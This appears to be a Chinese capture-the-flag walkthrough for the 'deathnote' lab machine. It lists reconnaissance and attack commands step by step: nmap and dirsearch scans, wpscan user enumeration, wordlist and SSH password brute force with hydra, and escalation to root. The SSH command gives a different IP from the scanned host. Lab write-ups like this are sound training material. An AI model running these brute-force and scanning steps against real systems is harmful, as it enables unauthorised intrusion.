- 主机扫描,发现192.168.1.194
arp-scan -l
- 端口扫描,发现80和22端口
nmap -sS 192.168.1.194
- 访问80端口发现自动跳转到http://deathnote.vuln/wordpress添加绑定地址就可以访问了
vim /etc/hosts 192.168.1.194 deathnote.vuln
访问发现并没有什么东西
4.目录扫描,发现robots.txt和wordpress/wp-login.php 可以访问
dirsearch -u http://192.168.1.194
5.robots.txt没看出有什么用
6.访问wordpress/wp-login.php发现是一个登录页面
使用wpscan进行用户扫描,发现用户kira
wpscan --url http://deathnote.vuln/wordpress/ --enumerate u
使用cewl命令爬取页面信息生成字典
cewl http://deathnote.vuln/wordpress/ -w Dnote.txt
使用wpscan进行爆破,但是没爆破出来
wpscan --url http://deathnote.vuln/wordpress/ --usernames kira --passwords Dnote.txt
7.继续进行目录扫描
dirsearch -u http://deathnote.vuln/wordpress/
发现许多可以访问的目录,但是一个一个试,发现就wp-content/uploads/目录有用
8.访问http://deathnote.vuln/wordpress/wp-content/uploads/下的2021文件夹,进入07文件夹,找到notes.txt和user.txt。
查看发现就是账号和密码。
9.将其下载到kali
curl http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt > notes.txt
curl http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt > user.txt
使用wpscan进行爆破还是没用,这里就用hybra进行ssh远程连接爆破了
hydra -L user.txt -P notes.txt ssh://192.168.1.194
发现了用户l和密码death4me
接着远程连接
ssh l@192.168.1.192
连接上后发现有个user.txt文件,查看后又是某种加密
使用brainfuck解密工具进行解密( Brainfuck/OoK加密解密 - Bugku CTF )。得到:i think u got the shell , but you wont be able to kill me -kira( 我想你得到了 shell,但你不能杀了我 —— kira )
(解密网站:https://ctf.bugku.com/tool/brainfuck)
10.继续进行信息收集,发现case.wav文件有内容,一看就是十六进制。
将其进行十六进制解码,再进行base64解码,得到密码。
passwd : kiraisevil
11.毫无疑问这是kira的密码,切换到kira,进行提权结果是root!
12.拿到权限查看目录下文件,查看root.txt的内容,得到flag